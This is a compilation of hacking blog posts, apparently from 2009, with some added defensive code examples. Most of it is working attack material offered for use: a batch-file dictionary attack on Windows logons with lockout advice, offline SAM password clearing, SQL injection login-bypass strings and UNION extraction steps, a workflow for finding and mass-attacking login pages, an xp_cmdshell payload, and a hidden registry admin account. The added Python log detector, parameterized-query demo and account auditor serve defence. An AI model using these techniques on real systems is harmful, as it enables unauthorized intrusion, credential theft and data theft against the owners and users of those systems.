Create and use this batch file to run a dictionary attack against the Windows logon credentials of a machine on the LAN. It tries each word from a password list as the password of a given account over the target's IPC$ share, using the same net use command as in the EV-DO post.

You need a dictionary text file for the attack to work. Just follow the steps below.

1. Open a Notepad file.
2. Copy and paste the code below and save it as a batch file with the .bat extension.

@echo off
if "%1"=="" goto usage
if "%2"=="" goto usage
del logfile.txt 2>nul
REM Try each word from passlist.txt. Drop any existing session to the target first,
REM because Windows refuses a second connection to the same server with other credentials.
FOR /F "tokens=1" %%i in (passlist.txt) do ^
net use \\%1\ipc$ /delete >nul 2>nul & ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
echo No password in passlist.txt matched.
goto end
:usage
echo Usage: LANbrute.bat target-host account
:end
echo *****Done*****

3. Make sure the dictionary file is in the same folder you run the program from and that it is named passlist.txt (one password per line; because of tokens=1, a password containing spaces is cut at the first space).
4. Open the command prompt and run the program from there with the target computer's IP address or hostname and a valid user name. The syntax is:

C:\>LANbrute.bat 192.168.21.2 Administrator

where LANbrute.bat is the name of the batch file saved in the root of the C drive, 192.168.21.2 is the IP address of the target computer, and Administrator is the victim account you want to crack.

5. The program launches the dictionary attack against the Administrator account on 192.168.21.2 using the passwords from passlist.txt and stops at the first match. Failed attempts are appended to logfile.txt. Two things to keep in mind: every attempt appears as a failed logon in the target's Security log if auditing is on, and if an account lockout policy is set the account locks after a few failures (the built-in Administrator account cannot be locked out, which is why it is the usual target).
6. If the right password is found, it is saved together with the time and date in a text file named output.txt in the same directory.

Disclaimer: This is only meant for educational purposes. The owner of this blog [Roney] is not responsible for whatever you do with this.

Information Gathering using Firefox

The first and foremost step in hacking is information gathering. Most people use a range of tools for network reconnaissance, but here is a trick that shows how to gather information about a target web server using nothing but the Firefox browser. Information gathering covers the following basics:

Domain name and IP address
Open ports
Daemon banner grabbing
OS fingerprinting
Server name and type

The domain name is the prime thing you need, at least to identify the target, and the IP address can be obtained simply by pinging it. For open-port detection you are better off with a dedicated tool, and once you have the open ports you can use telnet to grab the daemon banners, i.e. find out what service is actually running on each port and its version, so that if the daemon is a vulnerable one you can pick the right exploit. Then comes the really tough part, OS fingerprinting; most people use Nmap for that, and it is the right choice. A Whois lookup tells you who registered the domain and which name servers it uses, not what web server software runs on the host; the server software is announced by the web server itself, in the Server header of every HTTP response, and that is what Firefox can show you without any extra tool. You can launch a lot of exploits once you know the server type on the target, and if it is IIS 6.0 or older the task gets easier.

Open the Firefox browser and browse the target website just like a legitimate user. Once done, open a new tab (Ctrl + T), close the previous tab, type about:cache in the URL bar and press Enter. It lists the following:

Memory cache device
Disk cache device
Offline cache device

Under "Disk cache device" click the link that says "List Cache Entries". There you see a brief history of the sites you visited. Click on your target site's entry and it displays the response headers in clear text, including the server type and version in the Server header, the request method (GET or POST), and below that a hex dump of the cached response body, which looks a lot like a sniffer's output. Now you have the server type and version and can choose exploits accordingly. Keep in mind that the Server header is set by the administrator and can be altered or removed, so treat it as a hint rather than proof.

Hacking Windows Using Linux

Here is the trick that lets you reset the Windows administrator password from Linux.

Windows is installed on the computer, and you need a Linux live CD; here we use an Ubuntu live CD. Boot from the live CD and perform these 7 easy steps to reset the Windows Administrator password.

Steps:
1: Install a program called chntpw.
Command: $ sudo apt-get install chntpw
(The live CD needs internet access for this. chntpw is a Debian/Ubuntu package, not an RPM; it edits the password hashes in the SAM registry hive offline.)
2: After chntpw is installed, mount the Windows NTFS partition with read/write support, e.g.
$ sudo mount -t ntfs-3g /dev/sda1 /mnt
(replace /dev/sda1 with your Windows partition; sudo fdisk -l lists them). This only works if Windows was shut down properly rather than hibernated.
3: Navigate to the registry hive directory with cd, e.g.
$ cd /mnt/Windows/System32/config
(on XP it is /mnt/WINDOWS/system32/config; the names are case-sensitive under Linux).
4: Inside the config directory, issue this command:
$ sudo chntpw SAM
This edits the Administrator account by default; use sudo chntpw -u username SAM for another account, or sudo chntpw -l SAM to list the accounts in the hive.
Because you are working from Linux, the Windows access checks on the SAM file do not apply and the password can be changed easily.
5: A long display of information follows. Just ignore it.
6: When you are prompted, clear the password (option 1 in newer chntpw versions; older ones take an asterisk (*) for a blank password) rather than setting a new one, since clearing is far more reliable. Confirm writing the hive back when asked. Note that resetting the password this way makes that account's EFS-encrypted files and other DPAPI-protected secrets unrecoverable.
7: Reboot into Windows and log in as Administrator with a blank password, with full administrative access.

The trick shown here is for educational purposes only.

List Of Sql Injection Strings..

One of the most common problems with web applications that use SQL is that the values from login forms and URL parameters are pasted straight into queries. This tutorial does not go into detail on why these strings work; that is covered in my previous article, Top 10 Tricks to exploit SQL Server Systems. First, SEARCH the following keywords in Google or any search engine:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from; choose one that is vulnerable.

INJECTION STRINGS

How to use them? This is the easiest part, very simple. On the login page just enter something like

user: admin (you do not even have to put this)
pass: ' or 1=1--

or

user: ' or 1=1--
pass: ' or 1=1--

Some sites have just a password field, so password: ' or 1=1--

(How it works, in one line: the quote closes the string the application opened, OR 1=1 makes the condition true for every row, and -- comments out the rest of the query, including the application's own closing quote. Some engines want a space after the two dashes, and MySQL also accepts # as the comment marker.)

In fact I have compiled a combo list of strings like this to use on my chosen targets; there are plenty of strings in the list below. There are many other strings, for example UNION-based ones that read the table structure out of error pages and so eventually reveal the admin user/password tables. What I am interested in is quick access to targets.

PROGRAM: I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets and got 18 positive hits in a few minutes; how long would it take to go through 40 sites cutting and pasting each string combo? Example:

admin:' or a=a--
admin:' or 1=1--

and so on. You do not have to be admin and can still do anything you want. The most important part is ' or 1=1--, our basic injection string.

Now the only drudge part is finding targets to exploit. So I tend to search Google for login.asp or similar:

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp, result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search, 17,000 possible targets, and trying various searches spews out plenty more. Then, with a proxy set in my browser, I click through interesting targets, seeing what is on the site pages, and if something looks interesting I cut and paste the URL as a possible target. After an hour or so you have a list of potential targets like

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list, because I do not select all results or spider for login pages. I then save the list, fire up Ares and enter

1) A proxy list
2) My target IP list
3) My combo list
4) Start.

I do not want to go into problems with using Ares; the thing is I know it works for me. Sit back and wait. Any vulnerable target shows up in the hits box. When it finds a target it reports all the strings on that site as vulnerable, so you have to go through each one on the site by cutting and pasting the string until you find the right one. But the point is you know you CAN access the site. Really I need a program that returns the hit with a clickable URL and ignores false positives; I am still looking for one. That would save quite a bit of time going to each site and each string only to find it is not exploitable. There you go, you should have access to your vulnerable target by now.

One more thing: you can use the strings in URLs too. Where a URL has user=?, edit it up to the = and paste ' or 1=1-- so it becomes user=' or 1=1--, just as quick as the login route.

Combo List: There are a lot of other variations of the injection string that I cannot put on my blog because that is illegal. If you are interested I can send it to you by email; just write your email address in a comment and I will send it as early as possible, but be patient, it may take 1 or 2 days.

Monday, August 17, 2009

Hacking Password Protected Laptops

Password protecting a laptop does not ensure data protection; it provides a false sense of security. Passwords on laptops are good to implement to prevent unauthorized access, however when a thief steals a laptop and has time, getting around the password is quite simple. There would also be problems if there were no way to get around passwords, as even admins forget them and need access to the system. Passwords are good to have, but will not stop a thief from accessing the device, only slow them down a bit. Here is a quick run through of some common techniques for getting around the passwords on different platforms:
Windows XP & Vista
Windows passwords can be cracked using several available tools; one popular one is OphCrack, which is free. The software works with Windows, Mac OS X and Linux. It comes with a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. The latest version uses a new, faster technique using rainbow tables and can crack 99.99% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. The software works with older versions of Windows as well. Another, commercial, product is Proactive Password Auditor from Elcomsoft. The software utilizes similar techniques to OphCrack but with a bit more automation and a friendlier user interface. The product basically makes password cracking a mainstream technique that anyone can use to gain access to a system.
OS X
For OS X 10.4, the root password can be easily reset by booting the system from the Mac OS X installation CD, selecting the Reset Password option under "Utilities" from the installer screen and following the directions. OS X 10.5 can be reset using single user mode (hold down 'Command' and 'S' during reboot or startup). At the prompt, type the following commands in order:
fsck -fy
mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/username newpassword
Replace "username" with the real username and follow it with the new password, as shown.
Linux
Boot Linux into single-user mode
Reboot the machine.
Press the ESC key while GRUB is loading to enter the menu.
If there is a 'recovery mode' option, select it and press 'b' to boot into single user mode.
Otherwise, the default boot configuration should be selected. Press 'e' to edit it.
Highlight the line that begins with 'kernel'. Press 'e' again to edit this line.
At the end of the line, add an additional parameter: 'single'. Hit return to make the change and press 'b' to boot.
Change the admin password
The system should load into single user mode and you'll be left at the command line automatically logged in as root. Type 'passwd' to change the root password or 'passwd someuser' to change the password for your "someuser" admin account.
Reboot
Enter 'reboot' to restart into your machine's normal configuration.
These are just a few techniques used to get around password protection on laptops. The first thing that should be implemented is making passwords longer; a 14-character password can be cracked in a matter of minutes. Most IT administrators require a password of 8 characters; this is not sufficient. It is better to devise a phrase instead of just a word.
Encryption, Encryption, Encryption
If you have sensitive information on your system, it is important to ensure that the data is encrypted. Many operating systems have this built in, and there are also free encryption tools such as TrueCrypt that provide excellent encryption, so even if your password-protected laptop is cracked, your data is still secure. Just make sure you use a different password for your encrypted drive.

Friday, August 14, 2009

MYSQL TUTORIAL PART 2

Sub-section 2 :
Find the number of columns
So, now it's time to find the number of columns present. For this purpose, we will be using 'order by' until we get an error.
That is, we make our URL query as:
www.site.com/article.php?id=5 order by 1/*
//this didn't give an error.
Now I increase it to 2:
www.site.com/article.php?id=5 order by 2/*
//still no error
So we need to keep increasing until we get the error.
In my example, I got an error when I put the value 3, i.e.
www.site.com/article.php?id=5 order by 3/*
//this gave me an error.
So it means there are 2 columns in the current table (3-1=2). This is how we find the number of columns.
Sub-section 3 :
Addressing Vulnerable Part:
Now we need to use a union statement & find the column which we can replace so as to see the secret data on the page.
First let's craft a union statement which won't error. This becomes like this:
www.site.com/article.php?id=5 UNION ALL SELECT null/*
This would error because our query needs to have one more null there (one per column found above). Also, null doesn't cause any type conversion error as it is just null.
So for our injection, it becomes:
www.site.com/article.php?id=5 UNION ALL SELECT null,null/*
To see which of the columns is displayed on the page, we do:
www.site.com/article.php?id=5 UNION ALL SELECT 1,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere, like in the title of the page or sometimes even in the hidden tags in the source. So, this means we can replace the number with our commands to display the private data the DB holds.
In my example, 1 is seen on the page. This means, I should replace 1 with my things to proceed further. Got it?? So lets move forward.
Quick note: Sometimes the numbers may not be displayed, so it becomes hard for you to find the column which you can use to steal the data. In that case, you may try something like below:
www.site.com/article.php?id=5 UNION ALL SELECT xyz123,null/*
or
www.site.com/article.php?id=5 UNION ALL SELECT null,xyz123/*
If xyz123 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..
CTD...

Sub-section 4 :
Finding MySQL version:
For our injection, it is necessary to find the MySQL version because if it is 5, our job becomes a lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1 (which is the replaceable part) with @@version, i.e. we do as below:
www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/*
or
www.site.com/article.php?id=5 UNION ALL SELECT version(),2/*
So, this would return the version of MySQL running on the server.
But sometimes you may get an error with the above query. If that is the case, use the unhex(hex()) function like this:
www.site.com/article.php?id=5 UNION ALL SELECT unhex(hex(@@version)),2/*
Remember that if you have to use the unhex(hex()) function here, you will also have to use this function in the injection process later on.
@@version will give you the version. It may be either 4 (or below) or 5 & above. I am now going to discuss the injection process for version 5 and 4 separately because, as I said earlier, version 5 makes it easy for us to perform the injection.
Quick note: Also, you may check for the user, database, etc. by using the following:
www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
http://www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*
Sub-section 5 :
MySQL 5 or above injection:
Here, I am going to show you how to access data in a server running MySQL 5 or above.
You got MySQL version 5.0.27 standard using the @@version in the url parameter. MySQL from version 5 has a useful schema called information_schema. Its tables hold information about the tables and columns present in the DB server. That is, it contains the names of all tables and columns of the site.
For getting the table list, we use: table_name from information_schema.tables
For getting the column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be:
www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah, if you had to use unhex(hex()) while finding the version, you will have to do:
www.site.com/article.php?id=5 UNION ALL SELECT unhex(hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look for the probable table with that information. You can even write down the table names for further reference and work. For my example, I would use tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as:
www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding this info. They are username and password respectively. Succeed in the above and then comment here to get more info.
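The probing sequence in sub-sections 1 to 5 (the lone quote, order by, UNION ALL SELECT null, @@version, unhex(hex()), information_schema) leaves a recognisable trail in a web server's access log. This is an added detection example, not the tutorial's code; the log lines, IP addresses and signature names are constructed for it.

```python
"""Detect the SQL injection probe sequence from the tutorial above in
web-server access logs (added example; not the tutorial's own code)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in Apache/nginx "combined" style.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Aug/2009:10:01:02 +0530] "GET /article.php?id=5 HTTP/1.1" 200 5120
10.0.0.5 - - [14/Aug/2009:10:01:09 +0530] "GET /article.php?id=5' HTTP/1.1" 500 310
10.0.0.5 - - [14/Aug/2009:10:01:15 +0530] "GET /article.php?id=5%20order%20by%201/* HTTP/1.1" 200 5120
10.0.0.5 - - [14/Aug/2009:10:01:21 +0530] "GET /article.php?id=5%20order%20by%203/* HTTP/1.1" 500 310
10.0.0.5 - - [14/Aug/2009:10:01:40 +0530] "GET /article.php?id=5+UNION+ALL+SELECT+null,null/* HTTP/1.1" 200 5130
10.0.0.5 - - [14/Aug/2009:10:02:03 +0530] "GET /article.php?id=5+UNION+ALL+SELECT+unhex(hex(@@version)),2/* HTTP/1.1" 200 5140
10.0.0.5 - - [14/Aug/2009:10:02:30 +0530] "GET /article.php?id=5+UNION+ALL+SELECT+table_name,2+FROM+information_schema.tables/* HTTP/1.1" 200 9800
10.0.0.9 - - [14/Aug/2009:10:03:00 +0530] "GET /article.php?id=7 HTTP/1.1" 200 4800
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')

# (signature name, regex applied to the URL-decoded query string), in the
# order the tutorial's steps appear: lone quote, ORDER BY column counting,
# UNION SELECT, version fingerprinting, unhex(hex()) wrapper, information_schema.
SIGNATURES = [
    ("quote_probe", re.compile(r"=\d+'(\s|$)")),
    ("order_by_column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("unhex_hex_wrapper", re.compile(r"unhex\s*\(\s*hex\s*\(", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
]

def parse_line(line):
    """Split one combined-format line into fields; the query string is
    URL-decoded so that %20 and '+' encodings cannot hide a keyword."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    rec["status"] = int(rec["status"])
    return rec

def classify(query):
    """Names of every signature that matches the decoded query string."""
    return [name for name, rx in SIGNATURES if rx.search(query)]

def detect(log_text):
    """One record per request that matched at least one signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            hits.append({"ip": rec["ip"], "status": rec["status"],
                         "query": rec["query"], "tags": tags})
    return hits

def summarize(hits):
    """Per source IP: distinct signatures seen, request count and how many
    probes produced a 5xx (the error pages the tutorial relies on). An IP that
    walks most of the signature list is following the workflow, not mistyping."""
    by_ip = {}
    for h in hits:
        s = by_ip.setdefault(h["ip"], {"tags": set(), "errors": 0, "requests": 0})
        s["tags"].update(h["tags"])
        s["requests"] += 1
        if h["status"] >= 500:
            s["errors"] += 1
    return by_ip

if __name__ == "__main__":
    for ip, s in summarize(detect(SAMPLE_LOG)).items():
        print(ip, sorted(s["tags"]), "requests:", s["requests"], "errors:", s["errors"])
```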

MySQL Injection Tutorial Described

TABLE OF CONTENT:
#INTRO
#WHAT IS DATABASE?
#WHAT IS SQL INJECTION?
#BYPASSING LOGINS
#ACCESSING SECRET DATA
#Checking for vulnerability
#Find the number of columns
#Addressing vulnerable part
#Finding MySQL version
#MySQL 5 or above injection
#MySQL 4 injection
#MODIFYING SITE CONTENT
#SHUTTING DOWN THE MySQL SERVER
#LOADFILE
#MySQL ROOT
#MAJOR MySQL COMMANDS
#FINALIZING THE INJECTION TUTORIAL
#REFERENCES
#SECURITY SITES
#WARGAMEZ SITES
#GREETZ AND SHOUTZ
#THE END
INTRO!!
In this tutorial, I will demonstrate the infamous MySQL injection from a newbie's perspective so that all the newbies become able to become successful SQL injectors. But be sure to check various php & mysql functions on various sites, which will help you a lot. Let's begin our walkthrough of SQL injection.
WHAT IS DATABASE?
Just general info. A database is the application that stores a collection of data. A database offers various APIs for creating, accessing and managing the data it holds. And database (DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulty. A DB may hold various critical information like usernames, passwords, credit cards, etc. So, a DB needs to be secured, but many DB servers running are insecure either because of their vulnerability or because of poor programming. To name a few DB servers: MySQL (open source), MSSQL, MS-ACCESS, Oracle, PostgreSQL (open source), SQLite, etc.
WHAT IS SQL INJECTION?
SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which an unauthorized person can access various critical and private data. SQL injection is not a flaw in the web or DB server but is a result of poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attacks to execute from a remote location.
In SQL injection, we interact with the DB server with various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection, namely bypassing logins, accessing the secret data and modifying the page contents. So let's head forward on our real walkthrough.
CTD...
BYPASSING LOGINS
Suppose a site has a login form & only the registered users are allowed to enter the site. Now, say you wanted to bypass the login and enter the site as a legitimate user. If the login script block is not properly sanitized by the programmer, you may have luck entering the site. You might be able to log into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
Let's see an example, where the username admin with the password pass123 can log in to the site. Suppose the SQL query for this is carried out as below:
SELECT USER from database WHERE username='admin' AND password='pass123'
And if the above SELECT command evaluates true, the user will be given access to the site, otherwise not. Think what we could do if the script block is not sanitized. This opens a door for hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:
username: a' or 1=1--
password: blank
So, this would make our query as:
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator, which is /*.
So our above query becomes:
SELECT USER from database WHERE username='a' or 1=1
Now this query evaluates true even if there is no user called 'a' because 1=1 is always true and using OR makes the query return true when one of the conditions is true. And this gives access to the site admin panel.
There can be various other username and password combinations to play with on vulnerable sites. You can create your own new combinations for the site login.
A few such combinations are:
username: ' or 1='1 password: ' or 1='1
username: ' or '1'='1' password: ' or '1'='1'
username: or 1=1 password: or 1=1
and there are many more cheat sheets. Just google. In fact, you can create your own such combinations to bypass logins.
That's all about bypassing logins.
CTD...

ACCESSING SECRET DATA
SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.
Sub-section 1 :
Checking for vulnerability
Suppose you got a site:
http://www.site.com/article.php?id=5
Now to check if it is vulnerable, you would simply add ' at the end, i.e. where the id variable is assigned.
So, it is:
www.site.com/article.php?id=5'
Now if the site is not vulnerable, it filters and the page loads normally.
But if it doesn't filter the query string, it would give an error something like below:
"MySQL Syntax Error By '5'' In Article.php on line 15."
or
an error that tells us to check the correct MySQL version, or a MySQL fetch error, or sometimes just a blank page. The error may be in any form. So it makes us sure that the site is vulnerable.
Also, just using ' may not be the sure test, so you may try different things like:
www.site.com/article.php?id=5 union select 1--
If you get an error with this, you again come to know that it's vulnerable. Just try different things.
Read part 2 to continue...

What is SQL Injection ?

SQL injection is the most common and widely used exploit by hackers all over the world. A few days back I was just doing some SQL injection tests on Indian govt sites; I was shocked to see how many important govt sites are open to it. This is a big threat for us; a malicious hacker can do a lot of harm if he wishes to.
Vocabulary:
* SQL: Server Query Language- used in web applications to interact with databases.
* SQL Injection: Method of exploiting a web application by supplying user input designed to manipulate SQL database queries.
* "Injection": You enter the injections into an HTML form which is sent to the web application. The application then puts your input directly into a SQL query. Inadvertently, this allows you to manipulate the query.
Prerequisite:
* A background of programming and a general idea of how most hacking methods are done.


Application:
* Hacking a SQL database-driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. As is typical of all such methods, the frequency of possible targets decreases over time as the method becomes more known. This is one of those exploits that isn't easily prevented by a simple patch but by a competent programmer.
Use:
First, let's look at a typical SQL query:
SELECT fieldName1, fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntriesToReturn
Now, to dissect...
The placeholder names (fieldName1, fieldName2, databaseName and restrictionsToFilterWhichEntriesToReturn, shown in red in the original) are where criteria are input. The rest of the query structures the query.
* SELECT fieldName1, fieldName2 - Specifies the names of the fields that will be returned from the database.
* FROM databaseName - Specifies the name of the database to search.
* WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which entries to return.
Here is an example for somebody's login script:
SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)"
The idea is to guess what that application's query looks like and input things designed to return data other than what was intended.
In the example, input like the following could gain access to the administrator account:
User: administrator
Pass: " OR ""="
Making the query like this:
SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""=""
As you can see, ""="" is always true (nothing does indeed match nothing).
Note: Injections are rarely as simple as this...
One can be creative and use error messages to your advantage to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merge query results with ones not intended. On the security side, parse user data and get rid of any extra symbols now that you know how it's done.
The idea in this example is to break out of the quotation marks.
When stuff is inside quotation marks, it isn't processed as code but as a phrase, exactly what it is.
The password injection was: " OR ""="
What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it, so we have this:
userPass="" OR ""=""
Notice how the first and last quotation marks (the uncolored ones in the original) are the ones built in by the application; everything between them came from the injected input.
Additional notes:
This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand.
Here are a few SQL terms that do other things:
UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and such. Sometimes you may need to use ALL in conjunction to break out of certain clauses. It does no harm, so when in doubt you could do something like:
" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="admin
The key when using UNION is to make your new query return the same number of columns with the same datatypes so that you get the results you want.
--: This works sometimes to terminate the query so that it ignores the rest of the stuff that might be fed afterwards, if you don't like it. For example:
SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0qcQOVz7e0s"
NOT IN: If you have no idea which record you want, you could cycle through records (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry).
Usage:
SELECT userName, userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')
EXEC: This command should never work, but if it does...you win; you could do anything. For instance, you could inject something like this:
';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:
All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what they're doing:
INSERT INTO userProfile VALUES(''+ (SELECT userPass FROM userDatabase WHERE userName='admin')+ '' + 'Chicago' + 'male')
This example would theoretically put the admin's password in your profile.
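The login bypass described in this post, in the BYPASSING LOGINS section above, and in the admin:' or 1=1-- combo list post comes down to user input being concatenated into SQL text. This added example (not code from any of the posts) reproduces it against an in-memory SQLite table beside the parameterized form that defeats it; the users table, the accounts and the function names are constructed for the demonstration.

```python
"""Concatenated vs. parameterized login queries (added example; the table,
accounts and helpers are constructed, not taken from the posts above)."""
import sqlite3

def make_db():
    """In-memory users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "pass123", 1), ("alice", "s3cret", 0)])
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern the posts attack:
    whatever the user types becomes part of the SQL statement itself."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    # sqlite3's execute() runs a single statement, so the ';EXEC ...' style
    # stacked query from the post is refused here, but the OR/comment trick
    # changes the one statement's logic and still works.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver passes the input as data,
    so quotes, OR and -- inside it can never alter the statement's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Run the same inputs through both implementations; returns a dict of
    the user each login attempt was authenticated as (None = rejected)."""
    conn = make_db()
    results = {}
    # Legitimate credentials work with both; a wrong password fails with both.
    results["good_vuln"] = login_vulnerable(conn, "admin", "pass123")
    results["good_safe"] = login_parameterized(conn, "admin", "pass123")
    results["bad_vuln"] = login_vulnerable(conn, "admin", "wrong")
    # The basic injection string from the posts: the quote closes the
    # username literal, OR 1=1 is true for every row, and -- comments out
    # the password check.  Resulting statement:
    #   ... WHERE username='a' or 1=1--' AND password=''
    results["inj_vuln"] = login_vulnerable(conn, "a' or 1=1--", "")
    results["inj_safe"] = login_parameterized(conn, "a' or 1=1--", "")
    # The ' or '1'='1 variant needs no comment: the quotes stay balanced, so
    # the application's own closing quote is absorbed into the expression.
    results["bal_vuln"] = login_vulnerable(conn, "' or '1'='1", "' or '1'='1")
    results["bal_safe"] = login_parameterized(conn, "' or '1'='1", "' or '1'='1")
    return results

if __name__ == "__main__":
    for name, who in demo().items():
        print(f"{name:10s} -> {who}")
```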

Create Hidden Admin Account in XP

Since we are going to do all the editing in the Windows Registry, it is recommended to back up the registry before going further. After you have backed up your registry, follow these steps to create your hidden account:
First go to Start -> Run -> type regedit -> Enter
In the left pane go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+ alt+del twice to bring up Logon prompt
Type hidden Accounts name and password
Enjoy!!!
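A defender's counterpart to the steps above: this added helper (not part of the original post) reads the text that reg export writes for the UserList key and lists the accounts it hides from the welcome screen. The account names in the sample export are constructed.

```python
"""List accounts hidden from the XP welcome screen via the UserList key
(added audit example; the sample export and account names are constructed)."""
import re

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

# Constructed `reg export` output for the key, decoded from UTF-16 to text.
# A DWORD of 0 hides the account; the post creates the same setting as a
# string value, so both forms are accepted.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList]
"svc_backup"=dword:00000000
"Administrator"=dword:00000001
"auditor"="0"
"""

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?:dword:(?P<dw>[0-9a-fA-F]{8})|"(?P<s>[^"]*)")$')

def parse_userlist(export_text):
    """Return {account_name: int_value} for the entries under the UserList key.
    Values that cannot be read as an integer are skipped."""
    values, in_key = {}, False
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # Only values inside the UserList section count; a .reg file may
            # contain several keys.
            in_key = line[1:-1].lower() == USERLIST_KEY.lower()
            continue
        if not in_key:
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        raw = m.group("dw")
        try:
            values[m.group("name")] = int(raw, 16) if raw is not None else int(m.group("s"))
        except ValueError:
            continue
    return values

def hidden_accounts(export_text, expected_hidden=()):
    """Accounts hidden from the welcome screen (value 0) that are not in the
    caller's list of expected ones; these are the entries worth investigating."""
    values = parse_userlist(export_text)
    return sorted(name for name, v in values.items()
                  if v == 0 and name not in expected_hidden)

if __name__ == "__main__":
    print("hidden accounts:", hidden_accounts(SAMPLE_EXPORT))
```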

Thursday, July 23, 2009

NTFS vs FAT

To NTFS or not to NTFS: that is the question. But unlike the deeper questions of life, this one isn't really all that hard to answer. For most users running Windows XP, NTFS is the obvious choice. It's more powerful and offers security advantages not found in the other file systems. But let's go over the differences among the file systems so we're all clear about the choice. There are essentially three different file systems available in Windows XP: FAT16, short for File Allocation Table, FAT32, and NTFS, short for NT File System.
FAT16
